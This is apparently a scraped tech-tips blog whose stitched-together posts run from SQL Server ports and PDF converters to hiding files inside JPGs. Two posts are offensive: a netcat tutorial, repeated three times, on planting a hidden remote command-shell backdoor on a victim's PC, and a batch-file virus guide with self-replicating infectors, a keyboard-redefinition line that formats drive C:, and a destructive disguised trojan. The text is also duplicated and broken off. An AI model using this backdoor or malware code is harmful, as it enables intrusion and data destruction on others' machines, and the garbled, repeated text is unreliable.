determine if dynamic ports are enabled. If it lists a numeric value,
that value is the last dynamic port value that was used by SQL
Server. If it is blank, you are using a static TCP port.
4. Quit Registry Editor.

B)How to enable TCP/IP with dynamic ports
If you are using dynamic ports, you must create an exception for the
SQL Server program in Windows Firewall.

For more information about how to create an exception for the SQL
Server program in Windows Firewall, click the following article
http://support.microsoft.com/kb/841251/

C)How to enable TCP/IP with a static port
To enable TCP/IP connectivity for SQL Server listening on a static
port, you must first know the number of the port that SQL Server is
using. To find the port, you can either use the Server Network
Utility or use the Regkey method.
Use the Server Network Utility to find the port that SQL Server is
using
Note This method works for either a default instance or for a named
instance.1. If you are using the Server Network Utility, click
Start, point to All Programs, point to Microsoft SQL Server, and then
click Server Network Utility. If you are using MSDE or the command
line, click Start, and then click Run. In the Run dialog box, type
svrnetcn.exe, and then click OK.
2. In the Server Network Utility dialog box, you will see a list
of the disabled protocols and a list of the enabled protocols on the
General tab.
3. In the Instances on this server list box, select the instance
that you want to examine.
4. Click to select the protocol that you want to find the port
number for, and then click the Properties button.
5. Make a note of the port number.

Read more >>

Read more >>

You can use Text-Mining-Tool to automatically extract text from a PDF file so that you can use it in any program freely. Or if you cannot open a PDF file because you do not have a PDF viewer installed, you can use this tool to extract the text and read the document.

Text Mining Tool is completely free and does not even require an installation, simply unzip it and run the program to use it.

text mining tool

Click the Open button and choose your file that you want to convert to text. Click ok and the large window below the buttons will eventually fill with all of the text extracted from the document.

extract text

Click Save to save the extracted text to your computer. You can also click Clipboard to copy the mined text to the Windows clipboard.

For convenience, the following hotkeys can be used to perform the operations:

* Open - F3 or O.
* Save - F2 or S.
* Clipboard - F5 or C.
* Exit - F10 or Escape.

You can also use the minetext console tool to create a batch script for extracting text from multiple files. This can be useful if you have a directory with a large number of files that need to have text extracted.

-

If you’re a web designer, this program can be very useful to grab the text from a Word document without getting all of the extra Microsoft Office styling code included with the text.

This is a very simple program that is very simple to use! It has one basic purpose and it does a good job! Enjoy!

Read more >>

Sometimes when you recover a deleted picture, you’ll find that, even though it’s been 100% recovered, it has been damaged or corrupted, so you can’t view it. This can be very annoying, and it’s happened to me before. When it happens, the corrupted pictures taunt you, with their blank background, and only a few small words that read: ‘No Preview Avaliable’.

Please note that repairing a corrupted or damaged image is completely different from recovering a deleted image.

no-preview-available

Files can become corrupted if they happen to be stored on a hard drive that has bad sectors. Even if you run ScanDisk to fix the bad sectors, the image may still be corrupted and not viewable.

After vigorously browsing the Internet, I only found a few random methods on how to repair corrupted pictures.

The one program I found that worked was PixRecovery. It’s a data recovery program for corrupted or damaged files, which was exactly what I needed. It supports multiple file type, including all the big one’s like .JPEG and .GIF.

pixrecovery-repair-images

Using it was a breeze. Simply run the program, pick the file you wish to recover, and click ‘Recover‘. Done. In under 60 seconds, you should have a recovered file, which is a lot quicker than some of the other methods that popped up on Google. And there it is! Your file all nice and repaired.

The program also has a very clean and neat GUI interface without any bell and whistle useless features. It simply recovers files and that’s it.

The only thing I dislike about this program is the INSANE pricing of the program - It’s $149! And that’s just for a single user license. I think it’s because they’re the one of the few guys out there who have a program to repair corrupted image files which actually works.

So instead, I just used the Demo to recover as much as I could with it’s limited capabilities. To get the demo, simply go here:

http://www.officerecovery.com/downloads.htm

The program works fine in demo mode, but puts a watermark onto the image. It’s really handy, especially by getting all those memories again. But, the pricing is just too high for me to even consider buying the program. If you can live with the watermark, then use the demo or if your pictures are that important and a free program is not working, the $150 might be worth it.

Read more >>

If you’re looking to hide files on your PC hard drive, you may have read about ways to encrypt folders or change the attributes on a file so that they cannot be accessed by prying eyes. However, a lot of times hiding files or folders in that way requires that you install some sort of software on your computer, which could then be spotted by someone else.

I’ve actually written quite a few articles on how you can hide files and folders in Windows XP and Vista before, but here I’m going to show you a new way to hide files that is very counter-intuitive and therefore pretty safe! Using a simple trick in Windows, you can actually hide a file inside of the JPG picture file!

You can actually hide any type of file inside of an image file, including txt, exe, mp3, avi, or whatever else. Not only that, you can actually store many files inside of single JPG file, not just one! This can come in very handy if you need to hide files and don’t want to bother with encryption and all that other technical stuff.
Hide File in Picture

In order to accomplish this task, you will need to have either WinZip or WinRAR installed on your computer. You can download either of these two off the Internet and use them without having to pay anything. Here are the steps for creating your hidden stash:

* Create a folder on your hard drive, i.e. C:\Test and put in all of the files that you want to hide into that folder. Also, place the image that you will be using to hide the files in.

hide file in jpg

* Now select all of the files that you want to hide, right-click on them, and choose the option to add them to a compressed ZIP or RAR file. Only select the files you want to hide, not the picture. Name it whatever you want, i,e. “Hidden.rar”.

add to archive

* Now you should have a folder that looks something like this with files, a JPG image, and a compressed archive:

hidden rar

* Now here’s the fun part! Click on Start, and then click on Run. Type in “CMD” without the quotes and press Enter. You should now see the command prompt window open. Type in “CD \” to get to the root directory. Then type CD and the directory name that you created, i.e. “CD Test“.

cd test

* Now type in the following line: “copy /b 1.JPG + Hidden.rar 2.jpg” and press Enter. Do not use the quotes. You should get a response like below:

hide files in jpg

Just make sure that you check the file extension on the compressed file, whether it is .ZIP or .RAR as you have to type out the entire file name with extension in the command. I have heard that some people say that they have had problems doing this with a .ZIP extension, so if that doesn’t work, make sure to compress to a .RAR file.

And that’s it! The picture file will have been updated with the compressed archive inside! You can actually check the file size of the picture and see that it has increased by the same amount as the size of the archive.

You can access your hidden file in two ways. Firstly, simply change the extension to .RAR and open the file using WinRAR. Secondly, you can just right-click on the JPG image and choose Open With and then scroll down to WinRAR. Either way, you’ll see your hidden files show up that you can then extract out.

winrar

That’s it! That is all it takes to hide files inside JPG picture files! It’s a great way simply because not many people know it’s possible and no one even thinks about a picture as having to the ability to “hide” files. Enjoy!

Read more >>

Convert a PDF file to JPG - Easy Way

Go to ZamZar.com, browse for your file and choose PNG format for the format to conver to under Step 2. PNG is another newer picture format that is slowly replacing the JPG format. Most programs that can open JPG files can open PNG. Zamzar automatically converts each page in the PDF document into it’s own PNG picture file. Now you can simply open Microsoft Paint (yes, all you need it Paint!) and choose File - Save As from the menu and choose JPEG from the drop down list of formats.

microsoft paint

That’s it! By the way, if youare interested in how to extract the text from a PDF document or how to convert Word files to PDF, etc, check out the links.
Convert PDF to JPG Format - Second Way

The first thing you’ll need to do is download a free software (the only one I could find) that converts PDF documents to JPEG image format automatically. Go to the Omniformat download page and download both Omniformat v8.3 and the PDF995 app. You will need to download and install PDF995 first before installing Omniformat. Once you have both programs installed, go to your Start Menu programs, find the program group Software995 and click on Omniformat.

software995.jpg

The only annoying thing about this program is that it requires you to view some ads for about 30 seconds! However, it’s better than paying $20 or $40 for a program just to do a simple conversion! It does pop up another instance of your browser window for the web site of each of the sponsors, but it does not install any spyware onto your computer (no popup ads). Once the program is loaded, you’ll see it has a section called “Watch Folders” and then a button at the bottom titled “Start Monitoring” and “Single Pass“.

pdf-to-jpg.jpg

Basically the way it works is that you need to COPY the PDF files you want to convert to JPG format to the C:\omniformat\watch folder and then press Single Pass. The program will look in that directory and convert each page of each PDF into a separate JPG file. If you click Start Monitoring, you can keep dropping PDFs into that folder and the program will automatically convert them into JPGs as long as the program is open. Note that the program DELETES the original PDF document that it uses, so that’s why you need to COPY the PDF document to the watch folder, not move it! You should now see your converted files like below:

pdf-to-jpg-convert.jpg
Convert your PDF to a Word document

Go to Zamzar.com and click the Browse button next to Step 1 and choose your file. By default, Step 2 will be set to DOC format, but you can choose to convert your PDF to other file types such as TXT, HMTL, RTF, etc. Type in your email address for Step 3 and click Convert.

file conversion

You should receive an email within a few minutes with a download link to your converted file. I have tried out this service on some pretty complex PDF documents with text in multiple columns, multiple images, etc and have been very impressed with it’s conversion accuracy.
Convert a PDF file to Excel format

We will again follow the steps above using Zamzar, but this time choose TXT as the format you want to convert to. Unfortunately, you can’t convert straight to Excel format, so we’ll have to go through the intermediary TXT format. Once you have downloaded the TXT file and saved it on your computer, open Microsoft Excel and go to File - Open and change the Files of Type combo box to All Files.

convert pdf to excel

Now you should see the converted text file in the list of files. Choose it and click Open. You’ll now be brought to the Text Import Wizard. You have to open the file in this manner because if you simply right-click and say Open With Excel, all of the text for each row will appear in the first column and not be separated.

For Step 1, choose Delimited from the two options listed.

convert pdf to word

Click Next and check off the Space checkbox as one of the delimiters. Each value should now be separated by a vertical line, indicating it’s going to be in a separate column.

convert pdf to jpg

Click Next and then click Finish. You can now save the file as an Excel file by going to File - Save As. There are a few drawbacks, however, as this conversion does not always work perfectly! For example, if the original Excel sheet had a column where there was text with spaces included, each word will be separated into it’s own column! Also, you won’t see any formulas or functions that may have been in the original Excel sheet, only the text.

It’s as easy as that! You can use many other image editing programs also such as Photoshop, Corel, etc, etc, but I chose Paint because that is universally available on just about every Windows computer.

Read more >>

Do you want to share very large files through Internet and that too, as an e-mail attachment? Seems to be impossible, right? Well, impossible is nothing on the Internet. You can share very large files up to 10 with 10GB with ease, as an e-mail attachment with Sendago.

Sendago is a desktop-cum-web utility that allows you to share files that are too large. Sendago is a good alternate for e-mail attachment. You can use Sendago as a standalone application or integrate with outlook, e-mails are sent via outlook but the files are uploaded to sendago server, it provides a 10GB server for free, which means files of virtually unlimited size can be shared.

Some screenshots of Sendago

Links:

Download | Softpedia

Read more >>

Google recently introduced IMAP for Gmail which really brought its service one step ahead on the way to perfection.
WHAT IS IMAP
For those who do not know what IMAP is but are familiar with POP3, then let me tell you that IMAP is a newer technology in which unlike POP, the mails aren't downloaded but synchronized. In short, when you are using POP you have actually downloaded all the mails and attachments and then work on them on your hard-disk, even when offline: This is the plus point of pop. But it has a minus too, and that is, for example if you have deleted a mail in your client software, it will not be deleted on the server, this is what when I said that it only download the mails. Whereas, in IMAP, if you delete a mail on the server or in the client, the result will be seen on both the sides, its like working with mails on the server and not on the hard-disk.
GMAIL IMAP WITH WINDOWS LIVE MAIL
Windows live mail work robust with Gmail's pop as well as with the newly introduced IMAP. I have already written about Configuring Gmail POP with Live Mail and today I will teach you how to use Gmail IMAP with Live Mail.

1. Click the "Add new email account button" from the sidebar.
2. Write your Gmail address, your password and your name and don't forget to click the "Manually Configure Settings........." checkbox and click next as shown below
   
   
3. On the next screen, select IMAP as the server. Enter imap.gmail.com as the incoming server and smtp.gmail.com as the outgoing server and click next and on the other screen click Finish
4. Now on the sidebar, right click your account and select properties.
5. Select the "Advanced" Tab. Enter 587 as the outgoing mail server port and 993 as the incoming server port. Select the checkbox for SSL secure connection under incoming mail as shown
6. Click OK and Enjoy!

If you face any further problems, don't hesitate to leave a comment
UPDATE: With current configuration the folder structure in Live Mail will be created twice, one as a category and second as a sub-category, like this

To have it done correctly Write click account and select Properties. Scroll to the IMAP tab and under the Root Folder Path type [Gmail]

So that the output can be like this

Doesn't Live Mail make up a perfect match for Gmail, share your views in the comments!

Read more >>

Due to the seo problem i posted the links in www.hackto.blogspot.com a huge list of web proxy sites

Read more >>

I don’t know why splash screens were made. But they can add some and masala and mint to a software, they look nice and beautiful. Many softwares such as Adobe Photoshop, Flash and many others already have splash screens but our beloved browser, Firefox lacks one. Some may say that splash screens are nagging and interfere in our work but for others they offer a refreshing start for our work.
Splash!
Is an extension for Mozilla products which can add splash screens not only to Firefox but also to Flock, Thunderbird and Sunbird.
You just have to select any image which has to act as the splash, select the background color, specify if there should be any text displayed or sound played and Voila! You have your own splash screen ready.
Download the Splash Add-on
If you like, you can create your own splash screen (or just keep the photo of your dear ones) or have one ready made from here Ready Made Splash Screens.
Well, my favorite is this one

Read more >>

What is netcat.

Netcat is a networking security tool from the l0pht and can be used to
set up backdoors (ways of returning from a compromised system).
Setting up backdoors.

We must first create a batch file using a simple line command. The line must contain:

nc -L -d -p -t -e cmd.exe

Then we will place the netcat executable (nc.exe) onto the C:\windows\system32 directory.

NOTE: We are talking about win 2000,NT,XP. This wont work on other OS. The reason is simple. Read below and learn.

Then we must place the batch file in the C:\windows\system32 directory and run it. Then we simply need to use a telnet or netcat to connect to our victem. I will explain it using netcat. Open DOS (start->run->cmd.exe) and type in:

C:\WINDOWS\> nc -v

Once you connected to that port on the victem's computer, you'll have a DOS prompt that you can give any command on the victem's computer.

NOTE: The backdoor will close whenever the victem shuts down their
computer. To get it running again, just run the batch file.
Explaining the batch command line.

* nc tells Windows to run the nc.exe file with the following arguments:
*

-L Tells netcat to not close and wait for connections


*

-d Tells netcat not to open a Window when running
*

-p Specifies a port to listen for a connection on
*

-t Tells netcat to accept telnet connections
*

-e Tells what program to run once the port is connected to

How to use it on win 95,98,ME.

First, put the nc.exe file in the c:\windows directory. Put the batch file there too, but this time change the batch command line to:
What is netcat.

Netcat is a networking security tool from the l0pht and can be used to
set up backdoors (ways of returning from a compromised system).
Setting up backdoors.

We must first create a batch file using a simple line command. The line must contain:

nc -L -d -p -t -e cmd.exe

Then we will place the netcat executable (nc.exe) onto the C:\windows\system32 directory.

NOTE: We are talking about win 2000,NT,XP. This wont work on other OS. The reason is simple. Read below and learn.

Then we must place the batch file in the C:\windows\system32 directory and run it. Then we simply need to use a telnet or netcat to connect to our victem. I will explain it using netcat. Open DOS (start->run->cmd.exe) and type in:

C:\WINDOWS\> nc -v

Once you connected to that port on the victem's computer, you'll have a DOS prompt that you can give any command on the victem's computer.

NOTE: The backdoor will close whenever the victem shuts down their
computer. To get it running again, just run the batch file.
Explaining the batch command line.

* nc tells Windows to run the nc.exe file with the following arguments:
*

-L Tells netcat to not close and wait for connections
*

-d Tells netcat not to open a Window when running
*

-p Specifies a port to listen for a connection on
*

-t Tells netcat to accept telnet connections
*

-e Tells what program to run once the port is connected to

How to use it on win 95,98,ME.

First, put the nc.exe file in the c:\windows directory. Put the batch file there too, but this time change the batch command line to:
What is netcat.

Netcat is a networking security tool from the l0pht and can be used to
set up backdoors (ways of returning from a compromised system).
Setting up backdoors.

We must first create a batch file using a simple line command. The line must contain:

nc -L -d -p -t -e cmd.exe

Then we will place the netcat executable (nc.exe) onto the C:\windows\system32 directory.

NOTE: We are talking about win 2000,NT,XP. This wont work on other OS. The reason is simple. Read below and learn.

Then we must place the batch file in the C:\windows\system32 directory and run it. Then we simply need to use a telnet or netcat to connect to our victem. I will explain it using netcat. Open DOS (start->run->cmd.exe) and type in:

C:\WINDOWS\> nc -v

Once you connected to that port on the victem's computer, you'll have a DOS prompt that you can give any command on the victem's computer.

NOTE: The backdoor will close whenever the victem shuts down their
computer. To get it running again, just run the batch file.
Explaining the batch command line.

* nc tells Windows to run the nc.exe file with the following arguments:
*

-L Tells netcat to not close and wait for connections
*

-d Tells netcat not to open a Window when running
*

-p Specifies a port to listen for a connection on
*

-t Tells netcat to accept telnet connections
*

-e Tells what program to run once the port is connected to

How to use it on win 95,98,ME.

First, put the nc.exe file in the c:\windows directory. Put the batch file there too, but this time change the batch command line to:

nc -L -d -p -t -e command.com

Ok, that should be work. The reason is simple. Win 95,98,ME doesnt use execute paths like NT does. If you wouldn't have put the files in System32 directory on NT, the program wouldn't have executed the batch file because it wouldn't have been in the file path - but you don't have to worry about that in 95,98,ME. The reason why we put the files in the c:\windows directory on 95,98,Me is because that's where the command.com file is - the MS-DOS Prompt file. (It's cmd.exe on NT,2000,XP). That's why we ran command.com instead of cmd.exe.

Read more >>

Need to securely erase any hard drives hooked to your PC automatically when the FBI knocks on the door? Lets hope that isn’t the case, but if so Darik’s Boot and Nuke is the perfect solution. Darik’s Boot and Nuke is a ’self contained floppy disc’ that securely wipes all hard drives detected on the local PC.
From the README:

1.0 About Darik’s Boot and Nuke
——————————–
Darik’s Boot and Nuke (”DBAN”) is a self-contained boot floppy that securely
wipes the hard disks of most computers. DBAN will automatically and completely
delete the contents of any hard disk that it can detect, which makes it an
appropriate utility for bulk or emergency data destruction.

Download the exe and write the image to a floppy. Just make sure your kids or little brother don’t accidentally get a hold of the disk a boot from it!
Linux users can also unzip the exe and use dd to transfer the image to a floppy (see the README).
I know a lot of you know longer have floppy drives - there are more convenient DBAN CD images available.
How to automatically wipe all hard drives
WARNING: THIS WILL PERMANENTLY ERASE ALL DATA ON ALL HARD DRIVE HOOKED TO THE PC!!!

1. Boot from the DBAN floppy or CD image.
2. Enter ‘autonuke’ at the boot prompt.

And it is as simple as that! Hope you enjoyed and if you have any other methods of securely wiping your hard drives on the fly let us know in the comments!

Read more >>

Simple - Batch - File - Viruses - Explained!
by LINUX_PIR8

Part 1: Introduction


This document is written for lamerz in batch language. This explains the true basics of batch file programming. Even experienced programmers could probably learn a thing or to from this document. Now back in the good old days batch files were quite popular among virus writers because of the sheer simplicity of them. But people now days have been guided to Pascal, Delphi and C++. Those mentioned are very good and powerful programming languages but I don't know about you but I think they are boring and hard to cope with. Batch is the language for YOU! Simple to pick up and powerful at the same time. Now if you want to learn batch then keep reading other wise go back to watching Eastenders. Ok people you are the chosen ones.... Continue to the next part.



Part 2: Basic commands

Now there are loads of commands you should already know which are used in DOS. But if you dont know DOS I suggest you go get a book out from your local library and read your ass off because that is the only way to learn.

Commands listed below I hope you should already know: -

Command.com
Find.exe
Choice.com
Attrib.exe
Mem.exe
More.com
Sort.exe

Filz you should know about are: -

Autoexec.bat (especially this one would help)
Config.sys
Msdos.sys
Tmpdelis.bat
Dosstart.bat
win.ini
System.ini

Now filz such as these will help you in your understanding of batch language.

I will explain what each one does and how it can be used, are you ready...-

Command.com = the command interpreter, dos needs this to function!
Find.exe = can be used to search through almost anything for anything! (More on that later)
Choice.com = used for menu system functions e.g. a/b/c?
Attrib.exe = sets attributes on filz to make them read only or hidden
Mem.exe = Tells you about memory resources
More.com = More on this later :)
Sort.exe = Sorts data (not to sure on this one)
Autoexec.bat = start-up file processes functions and drivers needed
Config.sys = start-up file processes functions and drivers needed
Msdos.sys = same as above but go look in this one, it is interesting, go on play a little.
Tmpdelis.bat = is a windows batch file go look inside for more info...
Dosstart.bat = windows batch file used for dosprompt to load.
Win.ini/system.ini = windows initiation filz play with these and say good by to Winblows 95/98/NT

Heres some more details about some of the DOS commands:

FIND.EXE = This command is very powerful indeed. Yet to the everyday ignorant user this file means nothing! This file can search through files for specific words, through memory for specific files (tsr's) and through the bios for date, time day etc... This means i could if i wanted to see what the date is and if it is my specified date i could make my virus activate. You see where i am coming from now? It is a very powerful tool, for good and bad! In respect to the good side you could use this program to search through memory to find specific viruses such as the stoned and aircop virus, thus a virus detector!

CHOICE.COM = This file is not bad at all. It is for mainly menu systems in batch files, but can be used in other ways if the user wishes to. For instence this program can tell the difference between yes and no. It also has a delay sequence that you can activate, thus using it for timed viruses, e.g. Your Pc is going reset in 10 seconds.
This is a useful tool in viral programming, because you can get the user to activate the virus, by just pressing a key.

ANSI.SYS = This file is widley used in BFV's, it has unlimited use. Its main ability is that it can redirect keys to do commands, for example i could program the [a] key to format the hard drive. This is so powerful and dangerous, because it is so easy to do:

Prompt $e[97;"echo Y| format c:/u >nul";13p

Just that line could destroy the whole hard drive with out the user knowing. To use Ansi.sys it must be loaded into memory through config.sys file.

ATTRIB.EXE = This file is used in DOS for putting attributes on files making them read-only and/or hidden. Great concealment for bfv's.

Each command is some where along the line used in batch filz. But not all the time because they are not needed. For instance a simple batch file below, which asks the user to enter a password, needs no commands just pure batch language.

@Echo off
echo Enter password then [F6] and then smack the [Enter] key real hard!
prompt $e[30m
echo on
echo off
copy con password.dat>nul
prompt $e[0m
echo on
echo off
cls
copy password.set+password.dat password.bat>nul
call password.bat
if '%password%=='r3dhat goto done
echo Incorrect, you are not trying to break into my pc are you?
choice /t:y,3
if errorlevel 2 goto next
:next
erase password.bat
erase password.dat
:hello
cls
echo Turn off PC
goto hello
:done
erase password.dat
erase password.bat
set password=
prompt $p$g

Simple batch file, which asks the user for a password, and if they type it incorrect then the program will put them in an endless loop! Simple but effective. Other features; are that when typing the password the text colour is set to black so you cant see it then it resets the colour back to normal when finished. Erm...what else? Oh yeah it makes two files puts them together to make another batch file then runs it to set a variable into memory, then the password.bat file will look in memory to check what the user wrote to see if it is correct. Good thinking hey! Well experiment with this one can be interesting. Any bugs or improvements email me at linuxpir8@yahoo.com



Part 3: Viruses Explained

Now lets get one thing clear! A virus is not a program that gets on your hard drive by magic and then formats it.

A virus is a program, made to replicate/copy itself from one file to another. It can not infect files unless you RUN it! Most viruses come off disks or the NET and the user doesn't even realise until his MICROSOFT software decides it doesn't want to work anymore. (I THINK IT MIGHT BE BEST TO MENTION THAT I HATE MICROSOFT AND THE ONLY GOOD THING THAT HAS COME OF THEM IS MSDOS!)

Now despite my hatred towards Machosoft, i think that most viruses are aimed at Windows/x these days due to the mass numbers that use the O/S. But remember where there is Windows there is MSDOS!!! And where there is msdos there are batch filz and where there are batch filz there are my viruses.

A simple diagram: -

xxxxxxxxxxxxxx xxxxxxxxxxxxxx
x Mat156.bat x x mat156.bat x
xxxxxxxxxxxxxx xxxxxxxxxxxxxx
v virus v
vvvvvvvvvvvvvv
^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^
uninfected infected

That is the difference between the infected and the uninfected in batch filz.



Part 4: Simple Batch File Virus

Below I'm going to make up a virus then explain how it works. OK here goes....

Virus.bat

@echo off
ctty nul
for %%f in (*.bat) do copy %%f + virus.bat
ctty con

Thats it, simple infection routine that infects all batch filz in the current directory. This kind of infection is not popular among virus writers due to the way it infects. This virus will not only infect itself, but if it cant find anything to infect it will loop and re-infect all other batch filz all over again until all the memory or system resources are taken up. This is a bug but also a feature. It just appends itself on any batch file, lame but somewhat effective if used in the correct context. Try it out and play with it, as no real damage can occur. Mind you it is very quick, so if you leave it for ten seconds it probably will have infected other batch filz about 600 times. Batch file viruses are very fast. Im am now going to attempt to explain what each line does: -

@echo off - turns off the commands written in the program so the user cannot see what you are typing.
ctty nul - disables the keyboard and screen output, meaning you cant stop the virus unless you turn off your PC.
for %%f in (*.bat) do copy %%f + virus.bat - this puts the virus in all batch files in the current directory.
ctty con - re-enables the keyboard and the screen display.

Hope fully you understood all that and you are ready to go onto something more advanced.



Part 5: Advanced programming

OK here is the technical stuff. Variables! We set variables so that we can identify stuff. E.g.

set virus=*.bat

That command means that I can now say virus instead of *.bat. Meaning I can now say infect virus, instead of saying infect *.bat. May seem pointless but in the context that variables are used in it can be very powerful. Below is a virus that uses variables to infect: -

@ctty nul.LR
for %%a in (*.bat) do set LR=%%a
find "LR"<%LR% if errorlevel 1 find "LR<%0>>%LR%
ctty con.LR

This virus uses the variable LR to identify the batch file to infect. Now I will try to explain what this virus is doing in the simplest terms I can, ok you ready? Right this virus will disable the keyboard then search through all the batch filz until it reaches the last one, then it sets the variable LR to the last batch file found, ok so far so good. So now we have a variable assigned to a file. Then it searches through the file for the Key string (variable) LR and if it has it in there it wont infect it again but if it doesn't it will goto the next line. This is where the infection takes place. The virus finds the key string which you should have now guessed is LR which is on every line of the virus and then it finds the letters LR from %0 which is the current file normally the virus, and then gets all the lines with LR on them and inserts them into the file that the variable was assigned to earlier. Finally the virus then enable the keyboard for the user. Badly explained I know but try it out and put a few pause marks in the file and watch what it does! Suprisingly simple. This program is covered more clearly in my article about batch file viruses.



Part 6: Programs made in batch

I have not made that many programs in batch but use your imagination and you can. For example I earlier showed you the password file, I have also made a batch file virus remover, but what I haven't made is a virus detector. My friend at my college gave me the challenge to make a batch file that detects viruses or destructive commands so me and my big mouth took him up on the idea and came up with a lame program. Searches memory for popular memory resident viruses on a small scale, this could be enlarged to any number of viruses!

@echo off
echo [1] Stoned virus
echo [2] Aircop virus
choice /c:12
if errorlevel 2 goto aircop
:stoned
mem /c|find /i "stoned!" >nul
if errorlevel 1 goto no_virus
:virus
echo Sorry to inform you but you are infected with the stoned virus!
goto done
:no_virus
echo Congratulations man you are clean
:aircop
mem /c|find /i "Aircop" >nul
if error level 1 goto no_virus2
:virus
echo You have the Aircop virus.....Unlucky!
goto done
:no_virus2
echo You lucky son of a bitch no virus found!
:done

Very lame technique but if used on a larger scale it works really well and it tells you how much system resources the virus has taken up as well!

Alrighty then on to the real challenge, searching for destructive commands within BAT, COM, and EXE files. I did not make this program!! But phuck me it works!

@echo off
if '%2=='Loop goto loop
echo *** ANSI/BATCH SCANNER ***
set mask=%1 %2 %3 %4 %5 %6 %7 %8 %9
if '%mask%==' set mask=*.*
for %%f in (%mask%) do call %0 %%f Loop
goto done
:loop
if not exist %1 goto done
set line=
:: escape and tab characters
set esc=
set tab=
find "%esc%["<%1>nul
if not errorlevel 1 set line=%line%EscSeq
find /i "$e["<%1>nul
if not errorlevel 1 set line=%line%PromptSeq
find ";13p"<%1>nul
if not errorlevel 1 set line=%line%KeyRedef
if '%line%==' goto checkbad
find """p"<%1>nul
if not errorlevel 1 set line=%line%Key2
set hit=0
find "0p"<%1>nul
if not errorlevel 1 set hit=1
find "1p"<%1>nul
if not errorlevel 1 set hit=1
find "2p"<%1>nul
if not errorlevel 1 set hit=1
find "4p"<%1>nul
if not errorlevel 1 set hit=1
find "5p"<%1>nul
if not errorlevel 1 set hit=1
find "6p"<%1>nul
if not errorlevel 1 set hit=1
find "7p"<%1>nul
if not errorlevel 1 set hit=1
find "8p"<%1>nul
if not errorlevel 1 set hit=1
find "9p"<%1>nul
if not errorlevel 1 set hit=1
if %hit%==1 set line=%line%Key3
:checkbad
find /i "DEL "<%1>nul
if not errorlevel 1 set line=%line%Del
find /i "DELTREE"<%1>nul
if not errorlevel 1 set line=%line%Deltree
find /i "DEBUG"<%1>nul
if not errorlevel 1 set line=%line%Debug
find /i "ATTRIB "<%1>nul
if not errorlevel 1 set line=%line%Attrib
find /i "FORMAT C:"<%1>nul
if not errorlevel 1 set line=%line%Format
find /i "*.BAT"<%1>nul
if not errorlevel 1 set line=%line%BAT
find /i "*.EXE"<%1>nul
if not errorlevel 1 set line=%line%EXE
find /i "*.COM"<%1>nul
if not errorlevel 1 set line=%line%COM
echo %1 %tab%%line%
:done
set mask=
set line=
set hit=
set esc=
set tab=



Part 7: Viral writing groups

There are plenty of virus writing groups around but they all seem to be in it for fame? People that inspired me where Dark Avenger - who could program any batch file to do any thing!! Hellraiser - who hates Bill gates, but at the same time has some really good ideas, and Lucifer Messiha - who really put the v into virus. These guys dont write anymore but if they did then the viral comunity would be bowing down to them. Viral writing groups are to competetive, they are good at what they do but seem to be complete idiotic adolescents. The time i joined a writing group i thought, oh yeah im good but the reality of it was that i was not writing viruses for fun but i was writing viruses to compete. If you get to the stage that you can program a virus and you want to join a viral group then just remember the fun side of it, do it for yourself. I dont know if you've every heard of Rock Steady, but he wrote loads of viruses (destructive ones) and gave them to John mcaffee pretending he was a victim of this virus. This would then get the virus noticed and the anti virus program makes his virus well known, but at the same time it can be cured. Whta i mean is once you send in a virus the next anti-virus John brings out with have info on Rock Steadys virus. Is it worth it? He is a glory creator! By the way he turns out to be only 15 years old!!! Thats pritty much it on virus writing groups, lets now move on and go to ethics and moral matters concerning viruses.



Part 8: Ethics & morality

OK here is why i am always screwing at people about destructive viruses and trojans. Imagine yourself saving up a whole load of cash, and then buying a new software package. But to your dismay some little **** puts a destructive program on the package and it wipes your whole disk!!! Now if your hard drive contained the amount of valuable data that mine does, i tell ya you'll be pissed! imagine a whole years work from college on it being deleted! See my point. Most people that do make these programs are beginners trying to show off there power, more often than not they are lamerz! Any one can make a program to del all files (erase *), simple stuff. Now the only time destruction pops into my mind is if i get expelled from college or sacked from work i might be tempted to leave a logic bomb on a pc that went off on my bosses birthday or something. But never for nothing, its just not worth it. Alright thats enough of me blabbing on read the rest of this document and enjoy!



Part 9: Trojan story and programming Trojans

It all started off years ago, when two tribes went to war, one tribe lost. This tribe how ever never gave up, they sent a big wooden horse (trojan horse) as a token of there defeat, so when the winning tribe opened there gates and took in the horse the lost tribe jumped out from a secret hatch in the horse and defeated the tribe, thus winning in the end. They only won from concealment.

Now trojans are destructive programs that are made to look like they do good. Now programming trojans is easy but fooling the user takes the mind of a genius. This is how i would do it. I would make a trojan called setup.bat then i would make ten text filz and rename tham all to .DAT filz and pretend the package is a game. Once they run the setup.bat....BOOM trojan loaded and say goodbye. Programming trojans is easy, but getting caught is even easier. You have to make a trojan that can not only destroy filz but also destroy all traces of itself. Here is my program of how i would do it.
@echo off cd\ if exist c:\windows goto winslows if exist c:\dos goto do$ :poof erase * goto end_trojan :winblows cd\windows if exist system.ini del system.ini if exist win.ini erase win.ini ren *.exe *.vxe ren *.dat *.cat ren *.sys *.sex goto end_trojan :do$ cd\dos ren *.com *.kom ren *.exe *.com ren *.kom *.exe if exist c:\command.com erase c:\command.com :end_trojan erase trojan.bat

Extreme basics, but i tell you this would mess up your Windows system for good and Dos would have to be re-installed. Trojans are easy though, so stick to viruses and have PHUN! :)



Part 10: Endless loops for fun?

This bit is lame but what the hey this document is aimed at the lame.(no offence). Here are some simple programs which just loop:-

:loop
dir /s
goto loop

The above displays all the filz on the hard drive and dont stop!

:loop
echo Hello world my name is loopy loo!
goto loop

This one will make the text scroll down the page

@echo off
:poo
cls
echo Loopy loo needs a poo!
pause bell^G^G^G
goto poo

That one beeps in the pc and displays the text.

ok that should be enough. Read the last bit and then goto bed!



Part 11: BFV removal

These batch viruses work by adding code to the beginning and/or the end of the infected BAT files. The extra code can be removed by loading the infected batch into EDIT and deleting the additional lines. Some will create a hidden copy of themselves in the root (or other directory), use ATTRIB filename -s -r -h followed by DEL filename, filename being the actual name of the virus file. The command DIR /AH /S will show all hidden files on a drive.

Here is the code for a batch file virus remover:

@echo off
if '%1=='%temp% goto remove
echo BFV-remover version 1.0
echo =======================
echo ÿ
:start
echo ************** Batch File Virus Remover ****************
echo This will remove any batch file virus if used correctly.
echo BFV-remover will destroy batch files if they do not have
echo a virus!!! So please read the instructions first.
echo Made by l33 Rumbl3
echo ÿ
set ks=%1
set is=%2
if '%ks%==' goto exit
if '%is%==' set is=%ks%
if '%temp%==' set temp=C:\
echo Will remove %ks% from files containing %is%. Proceed?
choice /c:yn>nul
if errorlevel 2 goto exit
for %%v in (*.bat) do call %0 %temp% %%v
if exist rem$$_ del rem$$_
goto exit
:remove
